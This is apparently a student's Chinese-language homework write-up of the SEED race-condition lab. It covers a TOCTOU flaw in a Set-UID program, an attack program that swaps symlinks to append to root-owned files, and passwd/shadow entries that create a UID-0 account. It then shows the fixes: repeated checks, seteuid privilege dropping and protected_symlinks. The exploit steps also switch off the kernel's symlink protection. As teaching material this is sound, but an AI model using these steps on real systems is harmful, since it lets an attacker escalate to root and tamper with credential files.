2021-2022-1 20212804《Linux内核原理与分析》第十一周作业

竞态条件漏洞实验

一、实验简介

竞态条件是指多个线程同时访问或者操作同一块数据,运行的结果依赖于不同线程访问数据的顺序。如果一个拥有root权限的程序存在竞态条件漏洞的话,攻击者可以通过运行一个平行线程与漏洞程序竞争,以此改变该程序的行为。
1、利用vulp.c中的竞态条件漏洞可以做很多事情。其中一种是利用漏洞在 /etc/passwd 和 /etc/shadow 后追加信息。这两个文件是unix做用户授权用的,攻击者有可能利用这点创建用户,甚至是超级用户。
2、可以通过调用c函数symlink()创建连接。因为linux不允许创建已经存在的连接,我们需要先删除旧链接,下面的C代码演示如何移除一个旧链接并使/tmp/XYZ指向/etc/passwd:

unlink("/tmp/XYZ");
symlink("/etc/passwd","/tmp/XYZ");

或者使用命令ln -sf 创建链接,f选项意味着覆盖原链接。ln命令的内部实现本身就包含上文的两个函数。
3、最重要的一步(创建指向目标文件的链接)发生在调用access函数与fopen函数之间。既然我们无法更改漏洞程序,那么唯一能做的就是运行攻击程序,希望链接操作能在那段时间内发生。如果间隙很小的话,攻击成功率就比较渺茫了。所以你需要写程序自动化你的攻击流程,反复进行攻击,为避免手动输入vulp程序。你可以使用以下命令
./vulp < FILE (FILE是你 scanf 的文本文件)
4、检测攻击是否成功
既然普通用户无法访问shadow文件中的内容,那该如何知道文件是否被更改呢?可以看时间戳啊!而且一旦得知攻击成功就停止攻击这样做会更好一点,以下shell命令检查文件时间戳是否更改:

#!/bin/sh
#注意`不是单引号
old=`ls -l /etc/shadow`
new=`ls -l /etc/shadow`
while [ "$old" = "$new" ]
do
new=`ls -l /etc/shadow`
done
echo "STOP... The shadow file has been changed"
copy

5、意想不到的情况
如果 /tmp/XYZ 的所有人是root的话,情况就不太妙了,因为它的sticky位是开启的,这就意味着只有它的所有人能够删除它.
如果这种糟心事儿真的发生的话,你就得以root权限手动移除/tmp/XYZ再进行攻击了(坑爹嘛这不是!)。
记住,移除存在的链接与创建新的链接关系到两次完全独立的系统调用,所以如果在移除了/tmp/XYZ之后,目标程序获得机会运行fopen(fn, “a+”) 语句,他将会创建一个所有人为root的新文件。思考能够避免这种情况的方法。

二、实验内容

由于本实验环境开启了针对竞态条件攻击的保护,所以需要先关掉保护。该选项意味着全域可写sticky位开启的文件夹是不能作为链接目标所在文件夹的。

$ sudo su
$ echo 0 > /proc/sys/fs/protected_symlinks
$ exit

在 /home/parallels/seed 下新建 vulp.c 文件:

$ cd ~
$ mkdir seed
$ cd /home/parallels/seed
$ sudo vi vulp.c

下面是vulp.c的代码,看似无害,实则包藏祸心:

//vulp.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DELAY 10000
int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        /*为了增加实验成功率增加的延迟*/
        for(i=0; i < DELAY; i++){
            int a = i^2;
        }
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
}

这是一个 Set-UID 程序(root所有) 它将用户输入的字符串添加到文件 /tmp/XYZ 后,access() 会检查用户是否具备访问资源的权限,也就是说该函数检查real id而不是effective id。
这个程序第一眼看上去没有任何问题,但是这里有一个竞态条件漏洞。由于检查(access)与访问(fopen)之间存在时间间隙,所以检查与访问的就有可能不是同一个文件,即使它们的名字相同。如果一个恶意攻击者可以创建一个 /tmp/XYZ/ 链接指向 /etc/shadow,输入的字符串就会追加到shadow文件中去。

实验1: 利用竞态条件漏洞

实验1-1、重写拥有者为root的任意文件:

1.首先创建几个文件,注意这几个文件的权限和所有者 。

$ ls -l
-rw-rw-r-- 1 shiyanlou shiyanlou   10 Apr 23 13:33 append_text  《--VULP输入文件
-rw-rw-r-- 1 root      root         0 Apr 23 13:32 root_file  《--目标文件
-rw-rw-r-- 1 shiyanlou shiyanlou    0 Apr 23 13:45 tmp_file  《--助攻
-rwsr-xr-x 1 root      root      7403 Apr 23 13:27 vulp  《--漏洞文件
-rw-r--r-- 1 root      root       454 Apr 23 13:27 vulp.c

vulp.c 是在上面已经创建的,vulp 文件是编译 vulp.c 产生的文件,是我们的漏洞文件。

$ sudo gcc vulp.c -o vulp

编译漏洞程序代码并将其设为SET-UID文件。设置suid只需运行以下命令:

$ sudo chmod u+s vulp

新建 root_file 文件,它是我们的目标文件:

$ sudo touch root_file 
$ sudo chmod g+w root_file

新建append_text 文件,在append_text文件中加入你想要在root_file里加入的任意内容,比如 shiyanlou :

$ vi append_text

新建 tmp_file 文件,这是我们的助攻文件:

$ touch tmp_file

这样攻击条件就都具备了,这步之后都以普通用户的身份进行攻击。

2.创建检查时间戳的脚本check.sh,并将运行vulp的命令加入其中。

#!/bin/sh
#注意`不是单引号
old=`ls -l /home/parallels/seed/root_file`
new=`ls -l /home/parallels/seed/root_file`
while [ "$old" = "$new" ]
do
    ./vulp < append_text
    new=`ls -l /home/parallels/seed/root_file`
done
echo "STOP... The file has been changed"

不要忘记给脚本运行权限:

$ sudo chmod u+x check.sh

3.创建攻击代码attacker.c并编译

int main()
{
    while(1){
        system("ln -sf /home/parallels/seed/tmp_file /tmp/XYZ");
        system("ln -sf /home/parallels/seed/root_file /tmp/XYZ");
    }
    return 0;
}

编译命令如下:

$ gcc attacker.c -o attacker

此时文件夹目录的情况:

$ ls -l 
total 32
-rw-rw-r-- 1 shiyanlou shiyanlou   10 Apr 23 13:33 append_text
-rwxrwxr-x 1 shiyanlou shiyanlou 7164 Apr 23 14:01 attacker
-rw-rw-r-- 1 shiyanlou shiyanlou  155 Apr 23 14:00 attacker.c
-rwxrw-r-- 1 shiyanlou shiyanlou  246 Apr 23 13:58 check.sh
-rw-rw-r-- 1 root      root         0 Apr 23 13:32 root_file
-rw-rw-r-- 1 shiyanlou shiyanlou    0 Apr 23 13:45 tmp_file
-rwsr-xr-x 1 root      root      7403 Apr 23 13:27 vulp
-rw-r--r-- 1 root      root       454 Apr 23 13:27 vulp.c

4.点击 File-> Open Tab 在终端里新建标签页,先运行 attacker 再运行check.sh
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

可以看到内容已经被写进root_file中了。(顺序倒过来的话会导致调用fopen生成一个root权限的/tmp/XYZ文件,那样攻击就失败了。)

实验1.2:获取root权限

先回顾下passwd文件与shadow文件中的格式

/etc/passwd:
-------------
smith:x:1000:1000:Joe Smith,,,:/home/smith:/bin/bash
/etc/shadow:
-------------
smith:*1*Srdssdsdi*M4sdabPasdsdsdasdsdasdY/:13450:0:99999:7:::

这里假设 账户名:clover 密码:revolc
1.生成shadow密码

$ mkpasswd -m sha-512 revolc

2.格式替换

在 /etc/passwd 文件中添加:
-------------
clover:x:0:0:Lucy,,,:/home/clover:/bin/bash
在 /etc/shadow 文件中添加:
-------------
clover:$6$D1viNru/muy$RH/3rX7T977d81qTZx1ULeURLl1ldKDHT48Nn3UMaED2ppd6eC40URnvEnLcG0uDTk6aZj0tWpSdKStDuBKqU0:13450:0:99999:7:::

(注意输入文件的内容不能有空格或者换行,请用命令生成shadow密码。)

实验2: 保护机制A:重复

想要避免竞态条件的发生并不轻松,因为先检查再访问这个模式在很多程序中都是需要的。比起想办法移除漏洞,换个思路,我们可以增加更多的竞态条件,这样就能减小攻击者攻击成功的概率了。该机制的基础思想是重复access和fopen函数的次数。
请使用这个策略修改漏洞程序,重复你的攻击。
修改 vulp.c 代码如下:

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000
int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        if(!access(fn, W_OK)){
            /*嵌套n层*/
            fp = fopen(fn, "a+");
            fwrite("\n", sizeof(char), 1, fp);
            fwrite(buffer, sizeof(char), strlen(buffer), fp);
            fclose(fp);
        }
        else printf("No permission \n");
    }
    else printf("No permission \n");
}

注意:修改后重新编译一下。

实验3: 保护机制B:最小权限原则

该程序的根本问题就在于它违反了最小权限原则,程序员认识到运行这个程序的用户可能权利过大,所以引入access函数进行限制,但也同时引入了竞态条件的隐患。
更好的方法是使用setuid系统调用暂时禁止root权限,当需要时再恢复。请以此法修复漏洞,再重复之前的攻击,观察结果并解释。
代码如下:

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000 
int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    uid_t euid = geteuid(); 
    seteuid(getuid());
    for (i=0; i < DELAY; i++){
            int a = i^2;
    }
    if (fp = fopen(fn, "a+")){
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");  
    seteuid(euid);
}

同样,修改后重新编译一下

实验4: 保护机制C:Ubuntu内置方案

开启保护机制的命令如下:

$ sudo su
$ echo 1 > /proc/sys/fs/protected_symlinks
$ exit

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值